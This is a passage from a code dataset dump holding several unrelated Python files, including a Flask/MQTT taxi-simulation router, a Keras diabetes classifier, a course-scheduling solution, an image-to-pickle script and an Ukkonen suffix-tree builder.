flask_mqtt import Mqtt\nfrom flask_socketio import SocketIO\n\nfrom config.env import env\nfrom ams import Waypoint, Arrow, Intersection, Target, Topic\nfrom ams.nodes import SimTaxi, SimTaxiUser, SimTaxiFleet, TrafficSignal, User, Vehicle, FleetManager\n# from ams.messages import FleetStatus\n\nfrom pprint import PrettyPrinter\npp = PrettyPrinter(indent=2).pprint\n\nparser = ArgumentParser()\nparser.add_argument(\"-W\", \"--path_waypoint_json\", type=str,\n default=\"../../res/waypoint.json\", help=\"waypoint.json path\")\nparser.add_argument(\"-A\", \"--path_arrow_json\", type=str,\n default=\"../../res/arrow.json\", help=\"arrow.json path\")\nparser.add_argument(\"-I\", \"--path_intersection_json\", type=str,\n default=\"../../res/intersection.json\", help=\"intersection.json path\")\nargs = parser.parse_args()\n\neventlet.monkey_patch()\n\napp = Flask(__name__)\nwith app.app_context():\n app.waypoint = Waypoint()\n app.waypoint.load(args.path_waypoint_json)\n app.arrow = Arrow()\n app.arrow.load(args.path_arrow_json)\n app.intersection = Intersection()\n app.intersection.load(args.path_intersection_json)\n\n app.topics = {}\n\n topic = Topic()\n topic.set_targets(Target.new_target(None, SimTaxiUser.__name__), None)\n topic.set_categories(User.CONST.TOPIC.CATEGORIES.STATUS)\n app.topics[\"user\"] = topic.get_path(use_wild_card=True)\n\n topic = Topic()\n topic.set_targets(Target.new_target(None, SimTaxi.__name__), None)\n topic.set_categories(Vehicle.CONST.TOPIC.CATEGORIES.STATUS)\n app.topics[\"vehicle\"] = topic.get_path(use_wild_card=True)\n\n topic = Topic()\n topic.set_targets(Target.new_target(None, SimTaxiFleet.__name__), None)\n topic.set_categories(FleetManager.CONST.TOPIC.CATEGORIES.STATUS)\n app.topics[\"fleet_manager\"] = topic.get_path(use_wild_card=True)\n\n topic = Topic()\n topic.set_targets(Target.new_target(None, TrafficSignal.__name__), None)\n topic.set_categories(TrafficSignal.CONST.TOPIC.CATEGORIES.STATUS)\n app.topics[\"traffic_signal\"] = topic.get_path(use_wild_card=True)\n\n pp(app.topics)\n\nCORS(app)\n\napp.config['MQTT_BROKER_URL'] = env[\"MQTT_BROKER_HOST\"]\napp.config['MQTT_BROKER_PORT'] = int(env[\"MQTT_BROKER_PORT\"])\n# app.config['MQTT_KEEPALIVE'] = 5\n# app.config['MQTT_TLS_ENABLED'] = False\nmqtt = Mqtt(app)\n\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app)\n\n\ndef api_response(code=200, message=None):\n if message is None:\n response = jsonify({})\n else:\n response = jsonify(message)\n response.status_code = code\n return response\n\n\n@app.route('/')\ndef root():\n for topic in app.topics.values():\n mqtt.subscribe(topic)\n return render_template(\"index.html\", title=\"ams\", name=\"test_name\")\n\n\n@app.route(\"/getViewData\")\ndef get_view_data():\n waypoint_ids = app.waypoint.get_waypoint_ids()\n waypoints = {}\n arrows = app.arrow.get_arrows()\n lat_min, lng_min = float_info.max, float_info.max\n lat_max, lng_max = 0.0, 0.0\n for waypoint_id in waypoint_ids:\n lat, lng = app.waypoint.get_latlng(waypoint_id)\n lat_min = min(lat_min, lat)\n lat_max = max(lat_max, lat)\n lng_min = min(lng_min, lng)\n lng_max = max(lng_max, lng)\n waypoints[waypoint_id] = {\n \"geohash\": app.waypoint.get_geohash(waypoint_id),\n \"position\": dict(zip([\"x\", \"y\", \"z\"], app.waypoint.get_xyz(waypoint_id)))\n }\n return api_response(code=200, message={\n \"viewPoint\": {\n \"lat\": 0.5*(lat_max + lat_min),\n \"lng\": 0.5*(lng_max + lng_min)},\n \"waypoints\": waypoints,\n \"arrows\": arrows,\n \"topics\": app.topics\n 
})\n\n\n@app.route(\"/requestFleetRelations\")\ndef request_fleet_relations():\n # topic = Topic()\n # topic.set_root(FleetManager.TOPIC.SUBSCRIBE)\n # topic.set_message(fleet_manager_message)\n # message = topic.get_template()\n # message[\"action\"] = FleetManager.ACTION.PUBLISH_RELATIONS\n # mqtt.publish(topic.root, topic.serialize(message))\n return api_response(code=200, message={\"result\": \"requested\"})\n\n\n@socketio.on('message')\ndef handle_message(message):\n print(\"handle_message\", message)\n\n\n@mqtt.on_topic(app.topics[\"user\"])\ndef handle_mqtt_on_user_status_message(_client, _userdata, mqtt_message):\n message = mqtt_message.payload.decode(\"utf-8\")\n socketio.emit(\n app.topics[\"user\"], data={\"topic\": mqtt_message.topic, \"message\": message}, namespace=\"/ams\")\n\n\n@mqtt.on_topic(app.topics[\"vehicle\"])\ndef handle_mqtt_on_vehicle_status_message(_client, _userdata, mqtt_message):\n message = mqtt_message.payload.decode(\"utf-8\")\n socketio.emit(\n app.topics[\"vehicle\"], data={\"topic\": mqtt_message.topic, \"message\": message}, namespace=\"/ams\")\n\n\n@mqtt.on_topic(app.topics[\"traffic_signal\"])\ndef handle_mqtt_on_traffic_signal_status_message(_client, _userdata, mqtt_message):\n message = mqtt_message.payload.decode(\"utf-8\")\n socketio.emit(\n app.topics[\"traffic_signal\"], data={\"topic\": mqtt_message.topic, \"message\": message}, namespace=\"/ams\")\n\n\n@mqtt.on_topic(app.topics[\"fleet_manager\"])\ndef handle_mqtt_on_fleet_manager_status_message(_client, _userdata, mqtt_message):\n message = mqtt_message.payload.decode(\"utf-8\")\n socketio.emit(\n app.topics[\"fleet_manager\"], data={\"topic\": mqtt_message.topic, \"message\": message}, namespace=\"/ams\")\n\n\nif __name__ == '__main__':\n socketio.run(app, host=env[\"AMS_HOST\"], port=int(env[\"AMS_PORT\"]), use_reloader=True, debug=True)\n","sub_path":"examples/sim_taxi/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"145972487","text":"import pandas as pd\nimport numpy as np\nfrom typing import Tuple, List\n\n\ndef split_data(data: pd.DataFrame, last: int,\n next_columns: bool = True) -> Tuple[List[pd.DataFrame], pd.DataFrame]:\n\n time_depended = [\n np.array(data[[f\"Pay{k:02d}\", f\"Open{k:02d}\"]]) for k in range(last)]\n time_depended = np.swapaxes(np.array(time_depended), 0, 1)\n \n age_column = [\"age\",]\n age = data[[\"age\", ]] / data.age.max()\n\n lob = pd.get_dummies(data.LoB)\n lob_columns = [f\"LoB{k}\" for k in range(lob.shape[1])]\n\n inj_part = pd.get_dummies(data.inj_part)\n inj_part_columns = [f\"inj_part{k}\" for k in range(inj_part.shape[1])]\n\n static = pd.concat([age, lob, inj_part], axis=1)\n static.columns = age_column + lob_columns + inj_part_columns\n\n next_col = None\n if next_columns:\n next_col = data[[f\"Pay{last:02d}\", f\"Open{last:02d}\"]]\n\n return [static.values, time_depended], next_col.values\n","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"422098484","text":"import pandas as pd\nimport numpy as np\nimport tqdm\nimport utils.preprocess as utils\n\n# Get submission header\ncol_names = list(pd.read_csv(filepath_or_buffer='data/sample_submission.csv', nrows=1).columns)\nnum_classes = len(col_names) - 1\n\n# Get test data\n_train, test, _y_tgt, _train_cols = 
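split_data above scales the age column and one-hot encodes the categorical columns before concatenating them into one static-feature frame. A toy illustration of that encoding step (the frame below is invented):

import pandas as pd

df = pd.DataFrame({'age': [20, 40, 60], 'LoB': ['A', 'B', 'A']})
age = df[['age']] / df.age.max()          # scale age into [0, 1]
lob = pd.get_dummies(df.LoB)              # one-hot encode the category
static = pd.concat([age, lob], axis=1)
static.columns = ['age'] + [f'LoB{k}' for k in range(lob.shape[1])]
print(static)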
utils.prep_data()\n\n# Get test ids\nobject_ids = test[['object_id']].values.astype(np.int32)\nnum_ids = object_ids.size\n\n# RS bins\nrs_bins = test['rs_bin'].values.astype(np.int32)\n\n# Standard binary bin probing probabilities\nP = [\n 0.1,\n 0.3,\n 0.5,\n 0.7,\n]\n\n# List of pair probes\npairs = [\n (99, 90),\n (95, 92),\n (88, 67),\n (65, 64),\n (62, 53),\n (52, 42),\n (52, 42),\n (16, 15),\n (99, 6),\n]\n\n# Class vector\nclasses = [\n 99,\n 95,\n 92,\n 90,\n 88,\n 67,\n 65,\n 64,\n 62,\n 53,\n 52,\n 42,\n 16,\n 15,\n 6,\n]\nclasses = classes[::-1]\n\nfor tgt_class, comp_class in tqdm.tqdm(pairs, total=len(pairs)):\n\n bin_num = 0 # Galactic bin\n\n tgt_class_col = classes.index(tgt_class) # Col of class being probed with prob p on bin_num, 1-p elsewhere\n comp_class_col = classes.index(comp_class) # Col of class being probed with prob 1-p on bin_num, p elsewhere\n\n for i, p in tqdm.tqdm(enumerate(P), total=len(P)):\n\n probs = np.zeros((num_ids, num_classes))\n probs[rs_bins == bin_num, tgt_class_col] = p\n probs[rs_bins != bin_num, tgt_class_col] = 1-p\n probs[:,comp_class_col] = 1 - probs[:,tgt_class_col]\n sub = np.hstack([object_ids, probs])\n\n h = ''\n for s in col_names:\n h += s + ','\n h = h[:-1]\n\n # Write to file\n np.savetxt(\n fname=f'./subs_freq_probe/c{tgt_class}_c{comp_class}_p{p:.2f}.csv',\n X=sub,\n fmt=['%d']+['%.1f']*num_classes,\n delimiter=',',\n header=h,\n comments='',\n )","sub_path":"utils/create_freq_probe_subs.py","file_name":"create_freq_probe_subs.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"402339973","text":"# coding: utf-8\n# Pima Indians Diabets Prediction Model\n# Model Fitting\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom tensorflow.python.keras import Sequential\nfrom tensorflow.python.keras.layers import Dense\n\n# 1. load training/test data\ndataset = np.loadtxt(\"./dataset/pimaindians-diabetes.csv\", delimiter=\",\")\nx = dataset[:, 0:8]\nt = dataset[:, 8]\n\n# 2. model frame config\nmodel = Sequential()\nmodel.add(Dense(50, input_dim=8, activation='relu'))\n# model.add(Dense(8, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\n# 3. model fitting environment\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n# 4. model fitting\nhistory = model.fit(x, t, epochs=200, batch_size=10)\n\n# 5. training loss\ntrain_loss = history.history['loss']\n\n# 6. 그래프로 표현\nxlen = np.arange(len(train_loss))\nplt.plot(xlen, train_loss, marker='.', c=\"blue\", label='train loss')\nplt.show()\n\n# 5. result\nresult = model.evaluate(x, t, verbose=0)\nprint(f'\\n (Loss, Accuracy) = ({result[0]}, {result[1]})')\n\n# 6. 
predict\nx = np.array([[6, 148, 72, 35, 0, 33.6, 0.627, 50]])\npredict_y = model.predict(x)\npercentage = float(predict_y[0]) * 100.\nprint(f'\\nDiabetes incidence rate: {percentage:.2f}%')\n","sub_path":"04.deep-learning/03.tensorflow-keras-practice/01.pimaindians-diabetes/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"144037927","text":"\"\"\"\nfile: ejercicio3.py\n@ricardoifc\n\"\"\"\nnumeroEstudiante = input(\"enter the number of students\\t\")\nnumeroEstudiante = int(numeroEstudiante)\ncadena = \"\"\n\ncontador = 1\npromedioTotal = 0\nvalorPromedioTotal = 0\n\nwhile contador <= numeroEstudiante:\n\tnombre = input(\"enter your first name\\t\")\n\tapellido = input(\"enter your last name\\t\")\n\tnota = input(\"enter a grade\\t\")\n\tnota2 = input(\"enter a second grade\\t\")\n\n\tnota = float(nota)\n\tnota2 = float(nota2)\n\n\tpromedio = (nota + nota2)/2\n\tpromedioTotal = promedio + promedioTotal\n\n\tcadena = \"%s%s %s, with grades:\\n%f\\n%f\\nhas an average of %f\\n\" % \\\n\t(cadena, nombre, apellido, nota, nota2, promedio)\n\tcontador = contador + 1\n\nnumeroEstudiante = float(numeroEstudiante)\nvalorPromedioTotal = promedioTotal / numeroEstudiante\ncadena = \"%sThe course average is %f\" % (cadena, valorPromedioTotal)\nprint(cadena)","sub_path":"Python/2do ciclo/04 while cadena +/practica200519-ricardoifc-master/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"122321809","text":"\"\"\"\nThere are n different online courses numbered from 1 to n. Each course has some duration (course length) t and is closed on the dth day. A course\nshould be taken continuously for t days and must be finished before or on the dth day. You will start at the 1st day.\n\nGiven n online courses represented by pairs (t,d), your task is to find the maximal number of courses that can be taken.\n\nExample:\n\nInput: [[100, 200], [200, 1300], [1000, 1250], [2000, 3200]]\nOutput: 3\nExplanation: \nThere are 4 courses in total, but you can take 3 courses at most:\nFirst, take the 1st course, it costs 100 days so you will finish it on the 100th day, and be ready to take the next course on the 101st day.\nSecond, take the 3rd course, it costs 1000 days so you will finish it on the 1100th day, and be ready to take the next course on the\n1101st day. \nThird, take the 2nd course, it costs 200 days so you will finish it on the 1300th day. 
\nThe 4th course cannot be taken now, since you will finish it on the 3300th day, which exceeds the closed date.\n\nNote:\n The integer 1 <= d, t, n <= 10,000.\n You can't take two courses simultaneously.\n\"\"\"\nimport heapq\nclass Solution:\n def scheduleCourse(self, courses):\n \"\"\"\n :type courses: List[List[int]]\n :rtype: int\n \"\"\"\n courses.sort(key=lambda t: t[1])\n taken, time = [], 0\n for c in courses: \n if c[0] + time <= c[1]:\n time += c[0]\n heapq.heappush(taken, -c[0])\n elif taken and -taken[0] > c[0]:\n time = time + heapq.heappop(taken) + c[0]\n heapq.heappush(taken, -c[0])\n return len(taken)\n\n # still slow\n def scheduleCourse_(self, courses):\n \"\"\"\n :type courses: List[List[int]]\n :rtype: int\n \"\"\"\n def schedule(cur, index, date):\n if index == len(courses): return len(cur)\n \n if courses[index][0] + date <= courses[index][1]:\n return schedule(cur+[courses[index][0]], index+1, date+courses[index][0])\n else:\n for i in range(len(cur)-1, -1, -1):\n if cur[i] >= courses[index][0]:\n tmp = cur[i]\n cur[i] = courses[index][0]\n return schedule(cur, index+1, date-tmp+cur[i])\n return schedule(cur, index+1, date)\n\n if not courses: return 0\n courses.sort(key=lambda k: k[1])\n return schedule([], 0, 0)\n \n def scheduleCourse_(self, courses):\n \"\"\"\n :type courses: List[List[int]]\n :rtype: int\n \"\"\"\n def schedule(mem, index, date):\n if index == len(courses): return 0\n if mem[index][date] is not None:\n return mem[index][date]\n cur = schedule(mem, index+1, date)\n if courses[index][0] + date <= courses[index][1]:\n cur = max(cur, schedule(mem, index+1, date+courses[index][0])+1)\n mem[index][date] = cur\n return cur\n\n if not courses: return 0\n courses.sort(key=lambda k: k[1])\n mem = [[None] * courses[-1][1] for _ in range(len(courses))]\n return schedule(mem, 0, 0)\n\ns = Solution()\nprint(s.scheduleCourse([[100, 200], [200, 1300], [1000, 1250], [2000, 3200]]))\n","sub_path":"leetcode/courseSchedule/solutionIII.py","file_name":"solutionIII.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"36195660","text":"'''\r\nForm 96xN pickle file if the path spectrogram and midi files are given\r\n'''\r\n\r\n\r\n\r\n'''\r\nMake pickle for Image data\r\n\r\n'''\r\n\r\nimport numpy as np\r\nimport pickle\r\nimport natsort\r\nimport os\r\nimport cv2\r\n\r\npickImagepath=r'**Enter path'\r\nimageFiles=[]\r\nfor d in os.listdir(pickImagepath):\r\n imageFiles.append(os.path.join(pickImagepath, d))\r\n\r\nimageFiles = natsort.natsorted(imageFiles,reverse=False)\r\ninput_data = np.array([])\r\n\r\nfor i in range(len(imageFiles)):\r\n img = cv2.imread(imageFiles[i],1)\r\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n gray = np.transpose(gray)\r\n if i==0:\r\n input_data=gray\r\n else: \r\n input_data = np.concatenate((input_data, gray), axis=0)\r\n \r\n \r\n\r\nf = open(r'xx.pckl', 'wb')\r\npickle.dump(input_data, f)\r\nf.close()\r\nprint(input_data.shape)\r\n####################################################################################################################################\r\n'''\r\nMake pickle for Midi data\r\n\r\n'''\r\npickMidipath=r'**Enter path'\r\nmidiFiles=[]\r\nfor d in os.listdir(pickMidipath):\r\n midiFiles.append(os.path.join(pickMidipath, d))\r\n\r\nmidiFiles = natsort.natsorted(midiFiles,reverse=False)\r\ninput_data = np.array([])\r\n\r\nfor i in range(len(midiFiles)):\r\n img = cv2.imread(midiFiles[i],1)\r\n 
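The accepted solution above is the classic greedy schedule with a max-heap: sort courses by deadline, take each course that fits, and when one does not fit, swap out the longest course taken so far if it is longer than the new one. A compact standalone restatement for experimentation (the function name is illustrative):

import heapq

def max_courses(courses):
    courses.sort(key=lambda c: c[1])          # by deadline
    taken, day = [], 0
    for duration, deadline in courses:
        if day + duration <= deadline:
            day += duration
            heapq.heappush(taken, -duration)  # negate for a max-heap
        elif taken and -taken[0] > duration:
            # Evict the longest course taken so far in favor of this shorter one.
            day += heapq.heappop(taken) + duration
            heapq.heappush(taken, -duration)
    return len(taken)

print(max_courses([[100, 200], [200, 1300], [1000, 1250], [2000, 3200]]))  # 3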
gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n gray = np.transpose(gray)\r\n if i==0:\r\n input_data=gray\r\n else: \r\n input_data = np.concatenate((input_data, gray), axis=0)\r\n \r\n \r\nf = open(r'yy.pckl', 'wb')\r\npickle.dump(input_data, f)\r\nf.close()\r\nprint(input_data.shape)\r\n\r\n","sub_path":"dataset_creation/makePickle.py","file_name":"makePickle.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391694079","text":"\"\"\" This file contains a suffix array generator.\r\nThe suffix array is obtained by building a suffix tree (with ukkonen's algorithm) then traversing it.\r\n\"\"\"\r\n\r\nimport sys\r\n\r\n\r\nclass Node:\r\n ALPHABET_OFFSET = 97\r\n\r\n def __init__(self, node_id=None, alpha_size=26):\r\n \"\"\" Default alphabet set includes ASCII characters a - z, with special terminal symbol $ \"\"\"\r\n self.edges = [None] * (alpha_size + 1)\r\n self.leaf = True\r\n self.id = node_id\r\n\r\n def get_edge(self, character):\r\n \"\"\" Given a character, returns edge that links up to the corresponding child node \"\"\"\r\n return self.edges[Node.calc_index(character)]\r\n\r\n def connect(self, character, text_start, text_end, node_id):\r\n \"\"\" Adds a new edge that links up to another node corresponding to character specified \"\"\"\r\n new_node = Node(node_id)\r\n new_edge = Edge(text_start, text_end, new_node)\r\n self.edges[Node.calc_index(character)] = new_edge\r\n self.leaf = False\r\n\r\n def set_id(self, new_id):\r\n self.id = new_id\r\n\r\n def get_id(self):\r\n return self.id\r\n\r\n def is_leaf(self):\r\n return self.leaf\r\n\r\n def set_not_leaf(self):\r\n self.leaf = False\r\n\r\n @staticmethod\r\n def calc_index(char):\r\n \"\"\" Given a character, returns its corresponding index for the edges array \"\"\"\r\n return 0 if char == \"$\" else ord(char) - Node.ALPHABET_OFFSET + 1\r\n\r\n\r\nclass Edge:\r\n def __init__(self, text_start, text_end, next_node):\r\n self.text = text_start, text_end\r\n self.next = next_node\r\n\r\n def __len__(self):\r\n return self.text[1].get_end() - self.text[0] + 1\r\n\r\n def next_node(self):\r\n return self.next\r\n\r\n def insert(self, character, insert_point):\r\n \"\"\" Breaks an edge into two by inserting a new node in the middle\r\n and returns the internal node. 
Original substring represented by\r\n two nodes and one edge becomes three nodes and two edges.\r\n\r\n :time complexity: O(1)\r\n \"\"\"\r\n old_node = self.next\r\n remaining_edge = Edge(insert_point + 1, self.text[1], old_node)\r\n self.update_text(self.text[0], End(insert_point)) # shortens old edge\r\n\r\n # links internal node with the remaining edge\r\n internal_node = Node()\r\n internal_node.set_not_leaf()\r\n internal_node.edges[Node.calc_index(character)] = remaining_edge\r\n self.next = internal_node\r\n\r\n return self.next\r\n\r\n def get_text(self):\r\n return self.text\r\n\r\n def update_text(self, text_start, text_end):\r\n \"\"\" Typically used for shortening an edge \"\"\"\r\n self.text = text_start, text_end\r\n\r\n\r\nclass End:\r\n def __init__(self, end):\r\n self.end = end\r\n\r\n def increment_end(self):\r\n self.end += 1\r\n\r\n def decrement_end(self):\r\n self.end -= 1\r\n\r\n def get_end(self):\r\n return self.end\r\n\r\n\r\nclass Tree:\r\n def __init__(self, ref_text=\"\"):\r\n self.root = Node()\r\n self.ref_text = ref_text + \"$\"\r\n self.global_end = End(-1)\r\n\r\n def get_root(self):\r\n return self.root\r\n\r\n def get_edge(self, active_node, txt_ptr):\r\n \"\"\" Gets an edge of the node that corresponds to\r\n the character of ref_text, that is referred to by txt_ptr\r\n \"\"\"\r\n return active_node.get_edge(self.refer(txt_ptr))\r\n\r\n def refer(self, ref_index):\r\n return self.ref_text[ref_index]\r\n\r\n def skip_count(self, active_node, active_length, txt_ptr, txt_end):\r\n \"\"\" Skips through nodes and edges using using active_length,\r\n to return the appropriate pointers to a point in the tree that\r\n explicit character comparison needs to begin from\r\n\r\n :param active_node: current active node\r\n :param active_length: number of known matching characters that we can skip through;\r\n length defined from the start of the root\r\n :param txt_ptr: j\r\n :param txt_end: i\r\n :return: new active_node, new active edge, index of character to begin explicit comparison\r\n in self.ref_text, remaining active_length that is too short to skip through a node\r\n\r\n :time complexity: O(m), where m is the number of nodes of the longest path in the tree\r\n :space complexity: O(1)\r\n \"\"\"\r\n n = len(self.ref_text)\r\n active_edge = None\r\n\r\n if txt_ptr < n:\r\n active_edge = self.get_edge(active_node, txt_ptr)\r\n\r\n if active_edge is not None and active_length >= len(active_edge) and txt_ptr + len(active_edge) <= txt_end:\r\n active_length -= len(active_edge)\r\n txt_ptr += len(active_edge)\r\n\r\n # while the number of remaining known matching characters is\r\n # still sufficient to get skip the entire edge\r\n while active_length >= 0 and txt_ptr <= txt_end:\r\n active_node = active_edge.next_node()\r\n active_edge = self.get_edge(active_node, txt_ptr)\r\n if active_edge is None or active_length < len(active_edge):\r\n break\r\n else:\r\n active_length -= len(active_edge)\r\n txt_ptr += len(active_edge)\r\n\r\n return active_node, active_edge, txt_ptr + active_length, active_length\r\n\r\n def traveller(self, catch_up, active_node, active_edge, remaining, txt_ptr):\r\n \"\"\" Does explicit character comparison while no mismatch is found, traverses through\r\n nodes in the way if needed. 
Incorporates Rule 3 & showstopper.\r\n\r\n :param catch_up: Indicates how far j is behind i, used to know when it is ok to increment i\r\n if j catches up to i eventually during explicit character comparison\r\n :param active_node: current active node\r\n :param active_edge: current active edge\r\n :param remaining: The number of characters that can be skipped on the current edge\r\n :param txt_ptr: The position to start explicit character comparison in self.ref_text\r\n\r\n :time complexity: O(k), where k is the number of characters left from txt_ptr to the end of self.ref_text\r\n :space complexity: O(1)\r\n \"\"\"\r\n n = len(self.ref_text)\r\n i = self.global_end\r\n mismatch = False\r\n reached_node = False # True if just reached node cannot even find next edge to compare, False otherwise\r\n edge_ptr = remaining + active_edge.get_text()[0]\r\n total_matched_char = 0 # total number of matching characters during explicit comparison\r\n matched_char = 0 # number of matching characters starting from current active node\r\n\r\n while edge_ptr <= i.get_end() and not mismatch and txt_ptr < n:\r\n if self.refer(edge_ptr) == self.refer(txt_ptr):\r\n reached_node = False\r\n edge_ptr += 1\r\n txt_ptr += 1\r\n matched_char += 1\r\n\r\n # showstopper\r\n if txt_ptr > i.get_end() and i.get_end() + 1 < n:\r\n i.increment_end()\r\n catch_up += 1\r\n\r\n # traverse next node if reached the end of the edge\r\n if active_edge.get_text()[1].get_end() < edge_ptr <= i.get_end() and txt_ptr < n:\r\n total_matched_char += matched_char\r\n reached_node = True\r\n active_node = active_edge.next_node()\r\n active_edge = self.get_edge(active_node, txt_ptr)\r\n if active_edge is None:\r\n break\r\n edge_ptr = active_edge.get_text()[0]\r\n matched_char = 0\r\n else:\r\n mismatch = True\r\n\r\n return txt_ptr, catch_up, active_node, active_edge, matched_char, total_matched_char, reached_node\r\n\r\n def generate_suffix_array(self, current=None, suffix_array=None):\r\n \"\"\" Retrieve suffix id from the leaves in pre-order sequence to generate\r\n suffix array from the suffix tree\r\n\r\n :time complexity: O(n), where n is the number of nodes in the tree\r\n :space complexity: O(l), where l is the number of leaves in the tree\r\n \"\"\"\r\n if current is None:\r\n current = self.root\r\n suffix_array = []\r\n return self.generate_suffix_array(current, suffix_array)\r\n else:\r\n if current.is_leaf():\r\n suffix_array.append(current.get_id())\r\n\r\n for edge in current.edges:\r\n if edge is not None:\r\n next_node = edge.next_node()\r\n self.generate_suffix_array(next_node, suffix_array)\r\n return suffix_array\r\n\r\n @staticmethod\r\n def ukkonen(string):\r\n \"\"\" ALMOST ukkonen implementation to build a suffix tree,\r\n with all rules and tricks, except suffix links\r\n\r\n :time complexity: O(n**2), since i and j outer loops are O(2n)\r\n and skip count still loosely bounded by O(n), where n is the length of the string\r\n :space complexity: O(nc), where c is the alphabet size of the tree\r\n and n is the length of the string\r\n \"\"\"\r\n suffix_tree = Tree(string)\r\n i = suffix_tree.global_end\r\n j = active_length = catch_up = 0 # active_length defined from the root\r\n n = len(suffix_tree.ref_text)\r\n\r\n i.increment_end()\r\n while i.get_end() < n:\r\n while j <= i.get_end() and j < n:\r\n active_node = suffix_tree.get_root()\r\n active_edge = active_node.get_edge(suffix_tree.refer(j))\r\n pseudo_j = j\r\n remaining = 0\r\n\r\n # skip count to locate new character to compare\r\n if active_length > 
0:\r\n active_node, active_edge, pseudo_j, remaining = suffix_tree.skip_count(active_node, active_length,\r\n j, i.get_end())\r\n pseudo_j = min(pseudo_j, n - 1)\r\n\r\n if active_edge is None:\r\n insert_node = active_node\r\n insert_node_index = min(i.get_end(), pseudo_j, n - 1)\r\n active_length = max(active_length - 1, 0)\r\n catch_up = max(catch_up - 1, 0)\r\n else:\r\n # call traveller to compare characters explicitly as far as possible;\r\n # traveller increments i if necessary: Rule 3 + showstopper\r\n last_catch_up = j == i.get_end()\r\n catch_up = 0 if last_catch_up else catch_up - 1\r\n txt_ptr, catch_up, active_node, active_edge, matched_char, total_matched_char, reached_node = \\\r\n suffix_tree.traveller(catch_up, active_node, active_edge, remaining, pseudo_j)\r\n\r\n # Rule 2: break edge if mismatch occurs in the middle of an edge;\r\n # otherwise will be Rule 2: clean insert only\r\n if not reached_node:\r\n # insert internal node in existing edge\r\n old_edge_start = active_edge.get_text()[0]\r\n if matched_char == 0:\r\n old_edge_index = old_edge_start + max(remaining - 1, 0)\r\n else:\r\n old_edge_index = old_edge_start + matched_char - 1\r\n\r\n internal_node = active_edge.insert(suffix_tree.refer(old_edge_index + 1), old_edge_index)\r\n insert_node = internal_node\r\n else:\r\n insert_node = active_node\r\n\r\n insert_node_index = min(txt_ptr, n - 1)\r\n\r\n # update active length\r\n if i.get_end() == j:\r\n active_length = 0\r\n elif last_catch_up and catch_up > 0:\r\n active_length = total_matched_char - 1\r\n # j lags behind i at the start of the iteration\r\n # but then manages to catch up and matches characters exceeding i\r\n elif not last_catch_up and catch_up > 0 and total_matched_char > active_length:\r\n active_length += total_matched_char - 1\r\n else:\r\n active_length = max(active_length - 1, 0)\r\n\r\n # Rule 2: clean insert\r\n insert_node.connect(suffix_tree.refer(insert_node_index), insert_node_index, i, j)\r\n\r\n # Rule 1: extend leaf\r\n if i.get_end() == j:\r\n i.increment_end()\r\n\r\n j += 1\r\n\r\n i.decrement_end()\r\n return suffix_tree\r\n\r\n\r\ndef ukkonen_driver(file_name):\r\n \"\"\" Reads a string from the specified file, then generates a suffix array\r\n for it using a suffix_tree and writes it into output_suffix_array.txt\r\n \"\"\"\r\n with open(file_name) as input_file:\r\n contents = input_file.read().strip()\r\n\r\n suffix_tree = Tree.ukkonen(contents)\r\n suffix_array = suffix_tree.generate_suffix_array()\r\n\r\n with open(\"output_suffix_array.txt\", \"w\") as output_file:\r\n output_file.write(str(suffix_array[0]))\r\n for num in range(1, len(suffix_array)):\r\n output_file.write(\"\\n\" + str(suffix_array[num]))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n filename = sys.argv[1]\r\n ukkonen_driver(filename)\r\n\r\n\r\n\r\n","sub_path":"suffix_array.py","file_name":"suffix_array.py","file_ext":"py","file_size_in_byte":13536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519214935","text":"from typing import Optional, Tuple\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Conv2D, Dense, Dropout, Flatten, Input, Lambda, MaxPooling2D\nfrom tensorflow.keras.models import Sequential, Model\n\n\ndef lenet(input_shape: Tuple[int, ...], output_shape: Tuple[int, ...]) -> Model:\n num_classes = output_shape[0]\n layer_size = 128\n dropout_amount = 0.2\n ##### Your code below (Lab 2)\n \n model = Sequential()\n if len(input_shape) < 3:\n model.add(Lambda(lambda x: 
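Because the tree-based construction above is intricate, a brute-force suffix array is a useful cross-check on small inputs. A sketch (O(n^2 log n), fine for tests; the '$' terminator sorts before all lowercase letters, matching the tree's convention):

def naive_suffix_array(text):
    text = text + '$'
    # Sort suffix start positions by comparing the suffixes directly.
    return sorted(range(len(text)), key=lambda i: text[i:])

print(naive_suffix_array('banana'))  # [6, 5, 3, 1, 0, 4, 2]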
